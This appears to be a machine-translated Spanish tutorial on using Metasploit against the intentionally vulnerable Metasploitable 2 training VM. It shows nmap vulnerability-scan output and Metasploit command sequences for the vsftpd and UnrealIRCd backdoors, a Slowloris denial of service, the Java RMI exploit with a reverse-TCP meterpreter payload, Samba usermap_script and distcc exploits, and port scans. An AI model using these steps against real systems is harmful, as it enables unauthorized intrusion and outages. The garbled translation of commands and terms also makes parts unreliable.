Top 10 Ejemplos de uso de MetaSploit

Top 10 Ejemplos de uso de MetaSploit
MetaSploit es un marco de seguridad que viene con muchas herramientas para la explotación y las pruebas del sistema. Este tutorial muestra 10 ejemplos de ataques de piratería contra un objetivo de Linux. El objetivo de Linux es un entorno de capacitación metasplotable 2 OS, intencionalmente vulnerable para que los usuarios aprendan cómo explotar sus vulnerabilidades. Este tutorial solo se centra en 10 ataques de metasplotero específicos, para información sobre la instalación de MetaSploitable 2 Leer más aquí.Para comenzar a descargar metasploit.

En mi caso, he descargado la prueba gratuita de Metasploit Pro, pero puede obtener cualquiera de ellos.
La siguiente pantalla requerirá parte de su información personal, llénela para pasar a la página de descarga:

Descargar Metasploit para Linux:

Dé al instalador que acaba de descargar los derechos de ejecución ejecutando:

# chmod +x metaSploit-Latest-Linux-X64-Installer.correr

Luego ejecute Metasploit ejecutando:

# ./MetaSploit-Latest-Linux-X64-Installer.correr

Como ve las indicaciones de la GUI de un instalador, haga clic en Adelante continuar:

En la siguiente pantalla, acepte el Acuerdo de licencia y haga clic en Adelante:

Deje el directorio predeterminado y presione Adelante:

Cuando se le preguntó si instalar MetaSploit como servicio, la recomendación no es, si lo hace, el servicio de metasploit se iniciará cada vez que arranca, si presiona No El servicio MetaSploit se lanzará solo a su solicitud. Seleccione su elección y presione hacia adelante para continuar:

Para evitar interferencias, cuando se usa MetaSploit, apague su firewall, presione Adelante continuar:

A menos que el puerto mostrado ya esté utilizado, presione Adelante continuar:

Deja localhost y presiona Adelante continuar:

Luego continuar con la prensa de instalación Adelante por última vez:

El proceso de instalación comenzará:

Finalmente, se instaló Metasploit, a pesar del hecho de que no vamos a trabajar con la interfaz web de Metasploit, puede marcarlo para mantenerlo disponible. Prensa Finalizar para terminar.

Solución de problemas Error de DB MetaSploit:

En mi caso, cuando lancé MetaSploit, devolvió el error:

 No hay soporte de base de datos: no se pudo conectar al servidor: la conexión rechazada es el servidor que se ejecuta en el host "localhost" (:: 1) y aceptando conexiones TCP/IP en el puerto 7337? 

La razón de este error es que la dependencia de PostgreSQL no se instaló y el servicio MetaSploit tampoco.

Para resolverlo en ejecución:

# apt instalación -y postgresql

Luego comience a PostgreSQL ejecutando:

# Servicio de sudo PostgreSQL Inicio

Y finalmente iniciar el servicio de metasploit:

# SUDO SERVICIO METASPLOIT INICIO

Ahora corre msfonsole Nuevamente y notará que el error desapareció y estamos listos para atacar el metasplotable 2:

Uso de Metasploit para escanear un objetivo para vulnerabilidades:

El primer paso es escanear nuestro objetivo para descubrir servicios y vulnerabilidades en él. Para lograrlo, utilizaremos NMAP de MetaSploit y su script Vuln Script NSE (Motor de secuencias de comandos NMAP) utilizado para detectar vulnerabilidades:

# db_nmap -v --script vuln 192.168.0.184

NOTA: reemplazar 192.168.0.184 para su dirección IP o host objetivo.

Analicemos la salida de NMAP:

IMPORTANTE: Salida de NMAP contenida en más de 4000 líneas, por lo tanto, la salida se acortó dejando la información relevante para explicarse.

Las siguientes líneas solo nos muestran los tipos inicializados de escaneos que involucran NSE, escaneo de ping ARP, resolución DNS y un escaneo SYN sigiloso. Todos estos pasos ya se explicaban claramente en Linuxhint.com en nping y nmap arp scan, utilizando scripts nmap y escaneo de sigilo nmap.

Tenga en cuenta que NSE contiene pre-ejecución, durante la ejecución del escaneo y los scripts posteriores a la ejecución que se ejecutan antes, durante y después de que el proceso de escaneo inicia y finaliza.

 MSF5> DB_NMAP -V - -Script Vuln 192.168.0.184 [*] NMAP: comenzando nmap 7.70 (https: // nmap.org) al 2020-02-04 16:56 -03 [*] NMAP: NSE: cargados 103 scripts para escanear. [*] Nmap: nse: script pre-scanning. [*] NMAP: Iniciando a NSE a las 16:56 [*] NMAP: NSE completado a las 16:57, 10.00s transvieron [*] nmap: iniciando a NSE a las 16:57 [*] nmap: completado nse a las 16:57, 0.00s transcurrido [*] nmap: iniciando el escaneo de ping arp a las 16:57 [*] nmap: escaneo 192.168.0.184 [1 puerto] [*] nmap: escaneo de ping arp completado a las 16:57, 0.Transcurrido 05s (1 hosts totales) [*] nmap: iniciando la resolución de DNS paralelo de 1 huésped. a las 16:57 [*] nmap: resolución de DNS paralela completa de 1 anfitrión. a las 16:57, 0.Transcurrido 02s [*] nmap: iniciando syn shecn scan a las 16:57 [*] nmap: escaneo 192.168.0.184 [1000 puertos] 

El siguiente extracto muestra qué servicios están disponibles en nuestro objetivo:

 [*] NMAP: Puerto abierto descubierto 25/TCP en 192.168.0.184 [*] NMAP: Puerto abierto descubierto 80/TCP en 192.168.0.184 [*] NMAP: Puerto abierto descubierto 445/TCP en 192.168.0.184 [*] NMAP: Puerto abierto descubierto 139/TCP en 192.168.0.184 [*] NMAP: Puerto abierto descubierto 3306/TCP en 192.168.0.184 [*] NMAP: Puerto abierto descubierto 5900/TCP en 192.168.0.184 [*] NMAP: Puerto abierto descubierto 22/TCP en 192.168.0.184 [*] NMAP: Puerto abierto descubierto 53/TCP en 192.168.0.184 [*] NMAP: Puerto abierto descubierto 111/TCP en 192.168.0.184 [*] NMAP: Puerto abierto descubierto 21/TCP en 192.168.0.184 [*] NMAP: Puerto abierto descubierto 23/TCP en 192.168.0.184 [*] NMAP: Puerto abierto descubierto 1099/TCP en 192.168.0.184 [*] NMAP: Puerto abierto descubierto 512/TCP en 192.168.0.184 [*] NMAP: Puerto abierto descubierto 1524/TCP en 192.168.0.184 [*] NMAP: Puerto abierto descubierto 513/TCP en 192.168.0.184 [*] NMAP: Puerto abierto descubierto 514/TCP en 192.168.0.184 [*] NMAP: Puerto abierto descubierto 2121/TCP en 192.168.0.184 [*] NMAP: Puerto abierto descubierto 6000/TCP en 192.168.0.184 [*] NMAP: Puerto abierto descubierto 2049/TCP en 192.168.0.184 [*] NMAP: Puerto abierto descubierto 6667/TCP en 192.168.0.184 [*] NMAP: Puerto abierto descubierto 8009/TCP en 192.168.0.184 [*] NMAP: Puerto abierto descubierto 5432/TCP en 192.168.0.184 [*] NMAP: Puerto abierto descubierto 8180/TCP en 192.168.0.184 [*] NMAP: Syn Syn Stealth Scan a las 16:57, 0.12s transcurridos (1000 puertos totales) 

El siguiente informe de extracto NSE Post Scan Scripts Ejecución para encontrar vulnerabilidades:

 [*] NMAP: NSE: Script Scanning 192.168.0.184. [*] NMAP: Iniciando a NSE a las 16:57 [*] NMAP: NSE completado a las 17:02, 322.44s transcurrido [*] nmap: iniciando a NSE a las 17:02 [*] nmap: completado nse a las 17:02, 0.El transcurrido de 74s [*] NMAP: informe de escaneo NMAP para 192.168.0.184 [*] nmap: el host está arriba (0.Latencia 00075S). [*] Nmap: no se muestra: 977 puertos cerrados 

Como puede ver, NMAP ya encontró agujeros de seguridad o vulnerabilidades en el servicio FTP objetivo, incluso vincula los exploits de EE. UU. Para piratear el objetivo:

 [*] NMAP: Servicio Estatal de Puerto [*] NMAP: 21/TCP Open ftp [*] nmap: | ftp-vsftpd-backdoor: [*] nmap: | Vulnerable: [*] nmap: | VSFTPD versión 2.3.4 Backdoor [*] nmap: | Estado: vulnerable (explotable) [*] nmap: | IDS: OSVDB: 73573 CVE: CVE-2011-2523 [*] NMAP: | VSFTPD versión 2.3.4 Backdoor, esto se informó en 2011-07-04. [*] Nmap: | Fecha de divulgación: 2011-07-03 [*] NMAP: | Resultados de explotación: [*] nmap: | Comando de shell: id [*] nmap: | Resultados: uid = 0 (root) gid = 0 (root) [*] nmap: | Referencias: [*] nmap: | http: // ScaryBeastSecurity.blog.com/2011/07/alert-vsftpd-download-backDoored.html [*] nmap: | http: // OSVDB.org/73573 [*] nmap: | https: // github.com/Rapid7/MetaSploit-Framework/Blob/Master/Modules/Exploits/Unix/ftp/vsftpd_234_backdoor.rb [*] nmap: | _ https: // cve.inglete.org/cgi-bin/cvename.CGI?Nombre = CVE-2011-2523 

A continuación puede ver, además de los agujeros de seguridad FTP, NMAP detectó vulnerabilidades SSL:

[*] Nmap: | _sslv2-drown: [*] nmap: 22/tcp open ssh [*] nmap: 23/tcp abre telnet [*] nmap: 25/tcp abre smtp [*] nmap: | SMTP-VULN-CVE2010-4344: [*] nmap: | _ El servidor SMTP no es EXIM: no vulnerable [*] nmap: | SSL-DH-Params: [*] nmap: | Vulnerable: [*] nmap: | Vulnerabilidad anónima de intercambio de teclas Diffie-Hellman [*] nmap: | Estado: vulnerable [*] nmap: | Servicios de seguridad de la capa de transporte (TLS) que usan anónimo [*] nmap: | Diffie-Hellman Key Exchange solo proporciona protección contra pasivo [*] nmap: | Evesdropping y son vulnerables a los ataques activos de hombre en el medio [*] nmap: | que podría comprometer completamente la confidencialidad y la integridad [*] nmap: | de cualquier datos intercambiados en la sesión resultante. [*] Nmap: | Verifique los resultados: [*] NMAP: | Anónimo DH Group 1 [*] NMAP: | Suite Cipher: TLS_DH_ANON_WITH_AES_256_CBC_SHA [*] nmap: | Tipo de módulo: Safe Prime [*] nmap: | Módulo Fuente: Postfix Builtin [*] nmap: | Longitud del módulo: 1024 [*] nmap: | Longitud del generador: 8 [*] nmap: | Longitud de la clave pública: 1024 [*] nmap: | Referencias: [*] nmap: | https: // www.ietf.org/RFC/RFC2246.txt [*] nmap: | [*] Nmap: | Protocolo de seguridad de la capa de transporte (TLS) DHE_EXPORT CIPHERS REWgrade MITM (logJam) [*] nmap: | Estado: vulnerable [*] nmap: | IDS: OSVDB: 122331 CVE: CVE-2015-4000 [*] NMAP: | El protocolo de seguridad de la capa de transporte (TLS) contiene un defecto que es [*] nmap: | activado al manejar los intercambios de claves Diffie-Hellman definidos con [*] nmap: | el cifrado DHE_EXPORT. Esto puede permitir un atacante de hombre en el medio [*] nmap: | Para degradar la seguridad de una sesión TLS a 512 bits de grado de exportación [*] nmap: | La criptografía, que es significativamente más débil, permitiendo al atacante [*] nmap: | Para romper más fácilmente el cifrado y monitor o manipular con [*] nmap: | la transmisión encriptada. [*] Nmap: | Fecha de divulgación: 2015-5-19 [*] nmap: | Verifique los resultados: [*] NMAP: | DH Group 1 [*] nMap: | Suite Cipher: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA [*] nmap: | Tipo de módulo: Safe Prime [*] nmap: | Fuente del módulo: desconocido/personalizado [*] nmap: | Longitud del módulo: 512 [*] nmap: | Longitud del generador: 8 [*] nmap: | Longitud de la clave pública: 512 [*] NMAP: | Referencias: [*] nmap: | https: // débildh.org [*] nmap: | http: // OSVDB.org/122331 [*] nmap: | https: // cve.inglete.org/cgi-bin/cvename.CGI?nombre = CVE-2015-4000 [*] nmap: | [*] Nmap: | Diffie-Hellman Intercambio de claves Fuerza de grupo insuficiente [*] NMAP: | Estado: vulnerable [*] nmap: | Servicios de seguridad de la capa de transporte (TLS) que utilizan grupos Diffie-Hellman [*] NMAP: | de fuerza insuficiente, especialmente aquellos que usan uno de los pocos comúnmente [*] nmap: | grupos compartidos pueden ser susceptibles a ataques pasivos de espía. [*] Nmap: | Verifique los resultados: [*] NMAP: | Débil DH Group 1 [*] NMAP: | Suite Cipher: TLS_DHE_RSA_WITH_DES_CBC_SHA [*] nmap: | Tipo de módulo: Safe Prime [*] nmap: | Módulo Fuente: Postfix Builtin [*] nmap: | Longitud del módulo: 1024 [*] nmap: | Longitud del generador: 8 [*] nmap: | Longitud de la clave pública: 1024 [*] nmap: | Referencias: [*] nmap: | _ https: // weakdh.org [*] nmap: | ssl-poodle: [*] nmap: | Vulnerable: [*] nmap: | Fuga de información de caniche SSL [*] nmap: | Estado: vulnerable [*] nmap: | IDS: OSVDB: 113251 CVE: CVE-2014-3566 [*] NMAP: | El protocolo SSL 3.0, como se usa en OpenSSL a 1.0.1i y otros [*] nmap: | Productos, utiliza el relleno CBC no determinista, lo que lo hace más fácil [*] nmap: | para que los atacantes de hombre en el medio obtengan datos de ClearText a través de un [*] nmap: | Ataque de Oracle-Oracle, también conocido como el problema de "caniche". [*] Nmap: | Fecha de divulgación: 2014-10-14 [*] NMAP: | Verifique los resultados: [*] NMAP: | TLS_RSA_WITH_AES_128_CBC_SHA [*] nmap: | Referencias: [*] nmap: | https: // cve.inglete.org/cgi-bin/cvename.CGI?nombre = CVE-2014-3566 [*] nmap: | https: // www.openssl.org/~ bodo/ssl-poodle.pdf [*] nmap: | https: // www.imperialvioleta.org/2014/10/14/caniche.html [*] nmap: | _ http: // osvdb.org/113251 [*] nmap: | sslv2-drown: [*] nmap: | CIPHERS: [*] nmap: | Ssl2_rc4_128_export40_with_md5 [*] nmap: | Ssl2_des_192_ede3_cbc_with_md5 [*] nmap: | Ssl2_rc2_128_cbc_with_md5 [*] nmap: | Ssl2_rc2_128_cbc_export40_with_md5 [*] nmap: | Ssl2_rc4_128_with_md5 [*] nmap: | Ssl2_des_64_cbc_with_md5 [*] nmap: | Vulns: [*] nmap: | CVE-2016-0703: [*] nmap: | Título: OpenSSL: Recuperación de clave de sesión de división y concurrida en SSLV2 [*] NMAP: | Estado: vulnerable [*] nmap: | IDS: [*] nmap: | CVE: CVE-2016-0703 [*] NMAP: | Descripción: [*] nmap: | La función get_client_master_key en S2_SRVR.c en la implementación SSLV2 en [*] nmap: | OpenSSL antes de 0.9.8ZF, 1.0.0 antes de 1.0.0r, 1.0.1 antes de 1.0.1m y 1.0.2 antes [*] nmap: | 1.0.2a acepta un valor de longitud de clara de llave de teclado no cero para un [*] nmap: | cifrado, que permite a los atacantes de hombre en el medio determinar el valor de clave maestra [*] nmap: | y descifrar los datos de texto cifrado tls aprovechando un oráculo RSA RSA Bleichenbacher, un [*] nmap: | Problema relacionado con CVE-2016-0800. [*] Nmap: | [*] Nmap: | Refs: [*] nmap: | https: // cve.inglete.org/cgi-bin/cvename.CGI?nombre = CVE-2016-0703 [*] nmap: | https: // www.openssl.org/News/Secadv/20160301.TXT 

El siguiente extracto muestra muchas vulnerabilidades en el servidor web, incluido el acceso a páginas de inicio de sesión sensibles y vulnerabilidades de denegación de servicios.

 [*] Nmap: 53/tcp abre dominio [*] nmap: 80/tcp abrir http [*] nmap: | http-csrf: [*] nmap: | Araña limitada a: maxdepth = 3; maxpageCount = 20; Hosthost = 192.168.0.184 [*] nmap: | Encontró las siguientes vulnerabilidades CSRF posibles: [*] nmap: | [*] Nmap: | Ruta: http: // 192.168.0.184: 80/ dvwa/ [*] nmap: | ID de formulario: [*] nmap: | Acción de formulario: Iniciar sesión.php [*] nmap: | [*] Nmap: | Ruta: http: // 192.168.0.184: 80/dvwa/inicio de sesión.php [*] nmap: | ID de formulario: [*] nmap: | _ Acción de formulario: Iniciar sesión.php [*] nmap: | _http-dombased-xss: no pudo encontrar ningún XS basado en DOM. [*] Nmap: | http-enum: [*] nmap: | /tikiwiki/: tikiwiki [*] nmap: | /Test/: Página de prueba [*] nmap: | /Phpinfo.PHP: Posible archivo de información [*] nmap: | /phpmyadmin/: phpmyadmin [*] nmap: | /doc/: directorio potencialmente interesante con listado en 'Apache/2.2.8 (Ubuntu) dav/2 '[*] nmap: | /icons/: carpeta potencialmente interesante con listado de directorio [*] nmap: | _/index/: carpeta potencialmente interesante [*] nmap: | http-slowloris-check: [*] nmap: | Vulnerable: [*] nmap: | Slowloris DOS Attack [*] nmap: | Estado: probablemente vulnerable [*] nmap: | IDS: CVE: CVE-2007-6750 [*] NMAP: | Slowloris intenta mantener muchas conexiones al servidor web de destino abierto y mantenga presionado [*] nmap: | ellos abren el mayor tiempo posible. Logra esto abriendo conexiones a [*] nmap: | el servidor web de destino y el envío de una solicitud parcial. Al hacerlo, muere de hambre [*] nmap: | Los recursos del servidor HTTP causan la negación del servicio. [*] Nmap: | [*] Nmap: | Fecha de divulgación: 2009-09-17 [*] NMAP: | Referencias: [*] nmap: | http: // ja.ckers.org/Slowloris/[*] nmap: | _ https: // cve.inglete.org/cgi-bin/cvename.CGI?Nombre = CVE-2007-6750 

En esta etapa, NMAP encontró muchas vulnerabilidades de inyección SQL, la cantidad de vulnerabilidades era tan grande para este tutorial que eliminé muchas de ellas y dejé algunas:

 [*] Nmap: | http-sql-inyección: [*] nmap: | Posible sqli para consultas: [*] nmap: | http: // 192.168.0.184: 80/Dav/?C = n%3BO%3DD%27%20or%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/Dav/?C = S%3BO%3DA%27%20or%20SqlSpider [*] nmap: | http: // 192.168.0.184: 80/Dav/?C = M%3BO%3DA%27%20or%20SqlSpider [*] nmap: | http: // 192.168.0.184: 80/Dav/?C = D%3BO%3DA%27%20or%20SqlSpider [*] nmap: | http: // 192.168.0.184: 80/Mutillidae/índice.php?Page = Pen-test-tool-mingup.PHP%27%20or%20SQLSpider [*] NMAP: | http: // 192.168.0.184: 80/Mutillidae/índice.php?página = documentación%2fvulnerabilidades.PHP%27%20or%20SQLSpider [*] NMAP: | http: // 192.168.0.184: 80/Mutillidae/índice.php?Página = Data de captura.PHP%27%20or%20SQLSpider [*] NMAP: | http: // 192.168.0.184: 80/Mutillidae/índice.php?Page = Text-File-Viewer.PHP%27%20or%20SQLSpider [*] NMAP: | http: // 192.168.0.184: 80/Mutillidae/?página = agregar a tu blog.PHP%27%20or%20SQLSpider [*] NMAP: | http: // 192.168.0.184: 80/Mutillidae/?página = show-log.PHP%27%20or%20SQLSpider [*] NMAP: | http: // 192.168.0.184: 80/Mutillidae/índice.php?página = registrarse.PHP%27%20or%20SQLSpider [*] NMAP: | http: // 192.168.0.184: 80/Mutillidae/índice.php?página = html5-storage.PHP%27%20or%20SQLSpider [*] NMAP: | http: // 192.168.0.184: 80/Mutillidae/índice.php?Page = User-Info.PHP%27%20or%20SQLSpider [*] NMAP: | http: // 192.168.0.184: 80/Mutillidae/índice.php?Página = Inicio.php & do = toggle-intiss%27%20or%20SqlSpider [*] nmap: | http: // 192.168.0.184: 80/Mutillidae/índice.php?página = show-log.PHP%27%20or%20SQLSpider [*] NMAP: | http: // 192.168.0.184: 80/Mutillidae/índice.php?página = notas.PHP%27%20or%20SQLSpider [*] NMAP: | http: // 192.168.0.184: 80/Mutillidae/índice.php?Página = Enmarcado.PHP%27%20or%20SQLSpider [*] NMAP: | http: // 192.168.0.184: 80/Mutillidae/índice.php?página = Php-errores.PHP%27%20or%20SQLSpider [*] NMAP: | http: // 192.168.0.184: 80/Mutillidae/índice.php?Página = Inicio.php & do = toggle-seguridad%27%20or%20SQLSpider 

Debajo de NMAP descarta las vulnerabilidades XSS nuevamente (como en el primer extracto), e informa

Agujados de seguridad de invocación de métodos remotos (RMI) debido a una configuración incorrecta que permite a un atacante permitir la ejecución del código Java malicioso:

 [*] Nmap: | _http-xss: no pudo encontrar ninguna vulnerabilidad de XSS almacenada. [*] Nmap: | _http-trace: traza está habilitado [*] nmap: | _http-vuln-cVe2017-1001000: Error: Ejecución de script fallida (use -d para depurar) [*] nmap: 111/tcp open rpcbind [ *] Nmap: 139/tcp abre netbios-ssn [*] nmap: 445/tcp abre microsoft-dds [*] nmap: 512/tcp abre ex ejecut [*] nmap: 513/tcp abre login [*] nmap: 514/514/ TCP Open Shell [*] nmap: 1099/tcp open rmiregistry [*] nmap: | RMI-VULN-ClassLoader: [*] nmap: | Vulnerable: [*] nmap: | RMI Registro Configuración predeterminada Código remoto Ejecución Vulnerabilidad [*] nmap: | Estado: vulnerable [*] nmap: | La configuración predeterminada del registro RMI permite la carga de clases de URL remotas que pueden conducir a la ejecución del código remoto. [*] Nmap: | [*] Nmap: | Referencias: [*] nmap: | _ https: // github.com/Rapid7/MetaSploit-Framework/Blob/Master/Modules/Exploits/Multi/Misc/Java_rmi_Server.RB 

A continuación se puede ver vulnerabilidades SSL adicionales:

 [*] Nmap: | SSL-CCS-inyección: [*] nmap: | Vulnerable: [*] nmap: | Vulnerabilidad SSL/TLS MITM (inyección CCS) [*] nmap: | Estado: vulnerable [*] nmap: | Factor de riesgo: alto [*] nmap: | OpenSSL antes de 0.9.8za, 1.0.0 antes de 1.0.0m y 1.0.1 antes de 1.0.1H [*] nmap: | no restringe correctamente el procesamiento de los mensajes de cambio de cambio de cambio, [*] nmap: | que permite a los atacantes de hombre en el medio activar el uso de un cero [*] nmap: | Longitud Master Key en ciertas comunicaciones OpenSSL-to-Openssl, y [*] nmap: | En consecuencia, secuestrar sesiones u obtener información confidencial, a través de [*] nmap: | un apretón de manos TLS elaborado, también conocido como la vulnerabilidad de la "inyección de CCS". [*] Nmap: | [*] Nmap: | Referencias: [*] nmap: | https: // cve.inglete.org/cgi-bin/cvename.CGI?nombre = CVE-2014-0224 [*] nmap: | http: // www.Cvedetails.com/cve/2014-0224 [*] nmap: | _ http: // www.openssl.org/News/SECADV_20140605.txt [*] nmap: | SSL-DH-Params: [*] nmap: | Vulnerable: [*] nmap: | Diffie-Hellman Intercambio de claves Fuerza de grupo insuficiente [*] NMAP: | Estado: vulnerable [*] nmap: | Servicios de seguridad de la capa de transporte (TLS) que utilizan grupos Diffie-Hellman [*] NMAP: | de fuerza insuficiente, especialmente aquellos que usan uno de los pocos comúnmente [*] nmap: | grupos compartidos pueden ser susceptibles a ataques pasivos de espía. [*] Nmap: | Verifique los resultados: [*] NMAP: | Débil DH Group 1 [*] NMAP: | Suite Cipher: TLS_DHE_RSA_WITH_AES_128_CBC_SHA [*] nmap: | Tipo de módulo: Safe Prime [*] nmap: | Fuente del módulo: desconocido/personalizado [*] nmap: | Longitud del módulo: 1024 [*] nmap: | Longitud del generador: 8 [*] nmap: | Longitud de la clave pública: 1024 [*] nmap: | Referencias: [*] nmap: | _ https: // weakdh.org [*] nmap: | ssl-poodle: [*] nmap: | Vulnerable: [*] nmap: | Fuga de información de caniche SSL [*] nmap: | Estado: vulnerable [*] nmap: | IDS: OSVDB: 113251 CVE: CVE-2014-3566 [*] NMAP: | El protocolo SSL 3.0, como se usa en OpenSSL a 1.0.1i y otros 

El siguiente extracto muestra que nuestro objetivo está posiblemente infectado con un troyano contra un servicio IRC:

 [*] Nmap: | _irc-unrealircd-backdoor: parece una versión troyana de Unrealircd. Ver http: //lists.org/fulldisclosure/2010/jun/277 [*] NMAP: 8009/TCP Open AJP13 

El siguiente extracto muestra que el indicador httponly no está configurado correctamente, por lo tanto, el objetivo es vulnerable a los ataques de secuencias de comandos de sitios cruzados:

 [*] NMAP: 8180/TCP Open desconocido [*] nmap: | http-cookie-Flags: [*] nmap: | /admin/: [*] nmap: | JSessionID: [*] nmap: | Httponly Flag no establecido [*] nmap: | /admin/índice.html: [*] nmap: | JSessionID: [*] nmap: | Httponly Flag no establecido [*] nmap: | /admin/inicio de sesión.html: [*] nmap: | JSessionID: [*] nmap: | Httponly Flag no establecido [*] nmap: | /Admin/Admin.html: [*] nmap: | JSessionID: [*] nmap: | Httponly Flag no establecido [*] nmap: | /admin/cuenta.html: [*] nmap: | JSessionID: [*] nmap: | Httponly Flag no establecido [*] nmap: | /admin/admin_login.html: [*] nmap: | JSessionID: [*] nmap: | Httponly Flag no establecido [*] nmap: | /administrador/hogar.HTML: 

El siguiente extracto enumera o enumera interesantes directorios accesibles encontrados en nuestro objetivo:

 [*] Nmap: | http-enum: [*] nmap: | /admin/: posible carpeta de administración [*] nmap: | /admin/índice.html: posible carpeta de administración [*] nmap: | /admin/inicio de sesión.html: posible carpeta de administración [*] nmap: | /Admin/Admin.html: posible carpeta de administración [*] nmap: | /admin/cuenta.html: posible carpeta de administración [*] nmap: | /admin/admin_login.html: posible carpeta de administración [*] nmap: | /administrador/hogar.html: posible carpeta de administración [*] nmap: | /admin/admin-login.html: posible carpeta de administración [*] nmap: | /admin/adminlogin.html: posible carpeta de administración [*] nmap: | /admin/controlpanel.html: posible carpeta de administración [*] nmap: | /admin/cp.html: posible carpeta de administración [*] nmap: | /admin/índice.JSP: posible carpeta de administración 

Finalmente, el escaneo termina y se ejecuta el NSE posterior a la escaneo:

 [*] Nmap: | [*] Nmap: | Fecha de divulgación: 2009-09-17 [*] NMAP: | Referencias: [*] nmap: | http: // ja.ckers.org/Slowloris/[*] nmap: | _ https: // cve.inglete.org/cgi-bin/cvename.CGI?nombre = CVE-2007-6750 [*] nmap: MAC Dirección: 08: 00: 27: DD: 87: 8c (Oracle VirtualBox Virtual Nic) [*] NMAP: Resultados del script del host: [*] nmap: | _smb-vuln -ms10-054: falso [*] nmap: | _smb-vuln-ms10-061: falso [*] nmap: nse: script post-scanning. [*] Nmap: iniciando a NSE a las 17:02 [*] nmap: NSE completado a las 17:02, 0.00s transvieron [*] nmap: iniciando a NSE a las 17:02 [*] nmap: completado nse a las 17:02, 0.00s transcurrido [*] nmap: lea archivos de datos de:/opt/metaSploit/common/share/nmap/[*] nmap: nmap hecho: 1 dirección IP (1 host) escaneada en 333.96 segundos [*] nmap: paquetes en bruto enviados: 1001 (44.028kb) | RCVD: 1001 (40.120kb) MSF5> 

Ahora hemos identificado algunos agujeros de seguridad para atacar a nuestro objetivo.

Uso de Metasploit para hackear un servidor FTP:

Una vez que identificó los agujeros de seguridad en su objetivo, use los comandos de metasploit para encontrar las exploits adecuadas contra ellos. Como vio anteriormente, una de las primeras vulnerabilidades encontradas fue en el servidor VSFTPD, para encontrar exploits adecuados, dentro de MetaSploit Run:

# Buscar VSFTPD

Como ves, MetaSploit contiene una puerta trasera que posiblemente puede ayudarnos a hackear nuestro FTP objetivo. Para usar este exploit, dentro de MetaSploit Run:

# Use Exploit/Unix/ftp/vsftpd_234_backdoor

Para aprender a usar cualquier ejecución de exploit específica:

# Opciones de exhibición

Como verá arriba, esta exploit contiene 2 opciones, Rhosts (host remoto) y Rport. Necesitamos especificar el rhost, el puerto ya está especificado (21).
Para establecer el host remoto (RHOST) definiendo la ejecución de IP de destino:

# establecer Rhost 192.168.0.184

Una vez definido, el objetivo ejecuta el siguiente comando para explotar el orificio de seguridad:

# explotar

Como se pudo ver, obtuve un shell en el objetivo, cuando ejecuto "LS" puedo ver los archivos de destino, el ataque tuvo éxito. Para dejar el objetivo acaba de ejecutar:

#salida

Uso de Metasploit para Attack DOS:

Como vio durante el proceso de escaneo, se encontró una vulnerabilidad de Dos Slowloris, para encontrar cómo explotarlo, siga los pasos anteriores para buscar una herramienta adecuada, en este caso un módulo auxiliar en lugar de un exploit:

# Buscar lento a Slowloris

Una vez que encontramos una herramienta para atacar, ejecute:

# Use auxiliar/dos/http/slowloris
# establecer Rhost 192.168.0.184

Entonces solo escriba:

# correr

Notará mientras se ejecuta el ataque, el servicio HTTP objetivo no estará disponible, sigue cargando:

Una vez que detenemos el ataque presionando CONTROL+C El servidor estará disponible nuevamente:

Uso de Metasploit para hackear un servidor IRC:

El chat de retransmisión de Internet es ampliamente utilizado en todo el mundo, como se puede notar durante las primeras etapas del escaneo de metasploit, posiblemente encontró un servicio IRC (irreal IRCD) infectado con un troyano.

Repitemos los pasos para encontrar una herramienta para hackearla:

# buscar irreal ircd
# Use Exploit/Unix/Irc/Unreal_ircd_3281_Backdoor
# Opciones de exhibición
# establecer Rhost 192.168.0.184

Entonces corre:

# explotar

Y como puede ver nuevamente, tenemos una sesión de shell dentro del objetivo.

Uso de Metasploit para ejecutar código malicioso Java:

# Use Exploit/Multi/Misc/Java_rmi_Server
# Opciones de exhibición
# establecer Rhost 192.168.0.184
# Mostrar cargas útiles
# Establecer carga útil Java/Meterpreter/invers_tcp
# establecer lhost 192.168.0.50
# explotar

Uso de Metasploit para hackear a través de la vulnerabilidad de scriptsermap samba: vulnerabilidad:

Se omitirán algunos pasos como Exploits Search para evitar un gran tutorial. Para explotar esta ejecución de vulnerabilidad:

# Use Exploit/Multi/Samba/Usermap_Script
# Opciones de exhibición

Establezca la IP de destino y explotara ejecutando:

# establecer Rhost 192.168.0.184
# explotar

Como puede ver, ganamos un caparazón en nuestro objetivo.

Uso de MetaSploit para explotar la ejecución del comando DISTCC Daemon:

Esta vulnerabilidad se explica aquí.

Para comenzar a correr:

# use Exploit/Unix/Misc/Distcc_Exec

Entonces corre:

# establecer Rhost 192.168.0.184
# explotar

Como puede ver, obtuvimos acceso al objetivo nuevamente.

Uso de Metasploit para escaneo de puertos (forma adicional sin NMAP):

Llevar a cabo un escaneo TCP con MetaSploit:

Para ejecutar un escaneo diferente sin usar NMAP MetaSploit, ofrece alternativas que puede encontrar ejecutando:

# Portscan de búsqueda

Para hacer una ejecución de escaneo TCP:

# Usar escáner/portcan/tcp
# establecer Rhost 192.168.0.184

Para ver opciones adicionales:

# Opciones de exhibición

Elija el rango de puerto que desea escanear ejecutando:

# Establecer puertos 21-35

Luego ejecute el escaneo ejecutando:

# correr

Como puede ver los puertos 22,25,23 y 21 fueron encontrados abiertos.

Llevar a cabo un escaneo SYN con MetaSploit:

Para una ejecución de syn scan:

# Usar auxiliar/escáner/portcan/syn
# establecer Rhost 192.168.0.184
# Establecer puertos 80
# correr

Como puede ver, el puerto 80 se encontró abierto.

CONCLUSIÓN

MetaSploit es como una navaja suiza que tiene tantas funciones. Espero que hayas encontrado este tutorial no es útil. Siga a Linuxhint para obtener más consejos y actualizaciones sobre Linux y Networking.